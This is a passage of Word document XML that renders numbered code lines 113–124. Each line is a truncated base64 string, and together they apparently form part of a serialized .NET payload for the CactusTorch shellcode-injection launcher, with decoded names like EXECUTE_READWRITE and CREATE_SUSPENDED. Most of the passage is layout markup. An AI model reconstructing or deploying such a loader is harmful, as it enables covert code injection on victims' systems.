          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>F"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>T"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>116</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>117</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>J"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPU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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>kl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>U"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTU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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>D"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfU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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>U5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>J"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>kl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>O"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>124</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwV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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>y"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:48.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,970" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:970;width:9110;height:570" coordorigin="1430,970" coordsize="9110,570" path="m1440,999l1440,999,1440,999,1440,999,1441,999,1441,999,1441,999,1442,999,1442,999,1443,999,1444,999,1446,999,1448,999,1450,999,1452,999,1455,999,1459,999,1463,999,1467,999,1472,999,1477,999,1484,999,1490,999,1498,999,1506,999,1515,999,1525,999,1535,999,1547,999,1559,999,1572,999,1586,999,1601,999,1617,999,1635,999,1653,999,1672,999,1692,999,1714,999,1737,999,1761,999,1786,999,1813,999,1841,999,1870,999,1901,999,1933,999,1966,999,2001,999,2038,999,2076,999,2116,999,2157,999,2200,999,2245,999,2291,999,2339,999,2389,999,2441,999,2494,999,2550,999,2607,999,2667,999,2728,999,2791,999,2856,999,2924,999,2993,999,3065,999,3139,999,3215,999,3293,999,3374,999,3457,999,3542,999,3629,999,3719,999,3812,999,3907,999,4004,999,4104,999,4206,999,4311,999,4419,999,4529,999,4642,999,4758,999,4876,999,4998,999,5122,999,5249,999,5378,999,5511,999,5647,999,5785,999,5927,999,6072,999,6220,999,6371,999,6525,999,6682,999,6842,999,7006,999,7173,999,7343,999,7517,999,7694,999,7874,999,8058,999,8245,999,8436,999,8630,999,8828,999,9030,999,9235,999,9444,999,9656,999,9872,999,10092,999,10316,999,10543,999,10543,999,10543,999,10543,999,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,1054